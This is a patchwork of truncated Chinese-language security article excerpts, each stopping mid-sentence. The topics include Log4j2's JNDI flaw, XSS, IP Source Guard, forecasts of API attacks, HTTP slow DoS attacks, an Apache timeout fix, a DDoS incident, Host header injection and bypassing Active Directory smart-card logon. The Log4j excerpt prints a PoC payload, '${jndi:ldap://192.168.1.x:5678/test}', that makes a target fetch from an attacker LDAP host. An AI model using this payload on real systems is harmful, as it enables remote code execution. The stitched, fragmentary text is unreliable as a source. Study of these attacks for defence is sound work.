log4j漏洞最早出现在2021年11月24日一位阿里安全团队的员工发现的，上报到Apache之后，12月10日凌晨才被公开。该漏洞威胁等级较高。基本比肩与阿里当年的fastjson漏洞。漏洞地址：1.漏洞原理：Log4j是一种流行的Java日志记录工具,其升级版本Log4j2存在安全漏洞。这个漏洞是由Log4j2的lookup功能引起的,该功能允许开发者使用某些协议读取环境配置。但是在实现这个功能时,未对输入进行严格检查,导致出现了安全漏洞。poc:${jndi:ldap://192.168.1.x:5678/test}以上就是一个简单的log4漏洞利用的poc，这里我们主要需要了解的就是这

80.前端安全-保护你的应用免受攻击的关键作为前端工程师，我们不仅需要关注用户界面的设计和功能实现，还需要关注应用程序的安全性。前端安全是保护我们的应用程序免受恶意攻击和数据泄露的重要方面。本文将介绍前端安全的概念、常见的安全威胁以及一些防御措施，帮助前端工程师提高应用程序的安全性。1.XSS（跨站脚本攻击）跨站脚本攻击（XSS）是一种常见的安全威胁，攻击者通过在网站上注入恶意脚本来窃取用户的敏感信息或篡改网页内容。常见的XSS攻击方式包括：**存储型XSS：**攻击者将恶意脚本存储到服务器数据库中，当用户访问包含该脚本的页面时，脚本会被执行。**反射型XSS：**攻击者构造恶意链接，用户点击

一、IPSG(IPSourceGuard):IP源防攻击1.1基于二层接口的源地址过滤技术1.2 防止恶意主机伪造合法主机的IP地址1.3 确保非授权主机不能通过自己制定IP来访问和攻击网络二、IPSG工作原理2.1 利用绑定表去匹配二层接口收到的IP报文，只有匹配绑定表才可以通过，否则丢弃三、IPSG绑定表两种方式：3.1静态绑定：使用user-bind命令手工配置3.2 动态绑定：配置DHCPSnooping(推荐）绑定表生产后，IPSG绑定表向指定的接口或VLAN下发ACL，由ACL来匹配IP报文四、IPSG案例（user-bind+DHCPSnooping）4.1 PC1-PC2连接S

云原生应用程序编程接口管理公司Kong联合外部经济学家的最新研究预计，截至2030年API攻击将激增 996%，意味着与API相关的网络威胁的频率和强度都显着升级。这项研究由Kong分析师和布朗大学副教授ChristopherWhaley博士合作进行，研究了使用API作为入口点的攻击；预计API攻击的频率将从2022年的1241次上升到本十年末的13608次。研究还揭示了API网络攻击的经济影响。截至2023年，安全漏洞的平均成本为 610万美元；这一数字不仅包括补救的直接成本，还包括因公司声誉受损而造成的巨大价值损失。研究预测，到2030年，这一平均成本将增至近 1450万美元，增幅95%。

1.声明：本文仅限学习研究讨论，切忌做非法乱纪之事！什么是HTTP慢速攻击？HTTP慢速攻击是利用HTTP合法机制，以极低的速度往服务器发送HTTP请求，尽量长时间保持连接，不释放，若是达到了WebServer对于并发连接数的上限，同时恶意占用的连接没有被释放，那么服务器端将无法接受新的请求，导致拒绝服务。简单来说，就是我们每次只发一行，每次发送之间的间隔时间很长，这迟迟未发送结束的HTTP包会占用服务端的资源，当达到服务端处理请求的上限时，这时候再用户对网站正常请求，服务端也处理不了了，导致了拒绝服务。HTTP慢速攻击也叫slowhttpattack，是一种DoS攻击的方式。目的消耗服务器的

最近的一项研究表明，很多企业在抵御针对企业高管的网络攻击方面缺乏准备。在数字化转型时代，企业高管是企业的中坚力量，他们做出关键决策，并引领企业走向成功。然而，企业高管的突出角色使他们成为寻求利用有价值数据和获取经济利益的网络犯罪分子的主要目标。在数字时代，企业高管在指导业务运营和决策的过程中发挥着关键作用。他们的职位使他们能够访问敏感信息，但这也让他们成为寻求有价值数据和经济利益的网络犯罪分子的主要目标。针对企业高管的网络攻击变得越来越普遍和复杂，不仅对个人本身，也对他们所领导的公司造成了严重后果。BlackCloak公司和Ponemon研究所在2023年4月进行的一项研究表明，约42%的企业

Apache在httpd.conf中添加LoadModulereqtimeout_modulemodules/mod_reqtimeout.so查看是否存在mod_reqtimeout.so模块[root@localhost~]#rpm-qlhttpd|grep.so/usr/lib64/httpd/modules/mod_reqtimeout.so添加配置[root@localhost~]#vi/etc/httpd/conf/httpd.confIfModulereqtimeout_module>RequestReadTimeoutheader=5-40,MinRate=500body=20

于2022年2月26日，收到了腾讯的告警邮件上2图可以看到，于26日9点26开始至28分结束，被攻击2分钟，峰值GB级别。腾讯云直接对我的云机进行了封堵（外网离线）下面来分析下攻击来源及防范策略。来源：查看了nginx的日志发现了大量陌生IP然后我进行了查询，发现攻击IP均出自digitalocean与HurricaneElectric的云商群里的大佬分分支招，但是我担心国内实名的云机攻击会被叫去喝茶

漏洞说明为了方便的获得网站域名，开发人员一般依赖于HTTPHostheader。例如，在php里用_SERVER[“HTTP_HOST”]。但是这个header是不可信赖的，如果应用程序没有对hostheader值进行处理，就有可能造成恶意代码的传入。解决方法绿盟建议：web应用程序应该使用SERVER_NAME而不是hostheader。在Apache和Nginx里可以通过设置一个虚拟机来记录所有的非法hostheader。在Nginx里还可以通过指定一个SERVER_NAME名单，Apache也可以通过指定一个SERVER_NAME名单并开启UseCanonicalName选项。修复过程配

最近，我参与了一项攻击基于智能卡的活动目录的工作。实际上，你根本不需要使用物理智能卡来验证登录这个活动目录。证书的属性决定了它是否可以用于基于智能卡进行登录。因此，如果你能获得相应的私钥，那么就可以绕过智能卡的验证实现登录。当用户被设置为基于智能卡进行登录时，在它的默认配置中，域控制器将接受任何由它所信任的证书授权机构签署的、符合以下规范的证书：CRL的分配点不可为空、并且可用证书的密钥要使用数字签名增强型的密钥使用：智能卡登录客户端认证（可选，用于基于SSL的认证）包含用户UPN的主题替代名称此外，如果启用了允许使用无扩展密钥的证书属性组策略，那么就没必要使用增强型的密钥。因为这可能会导致发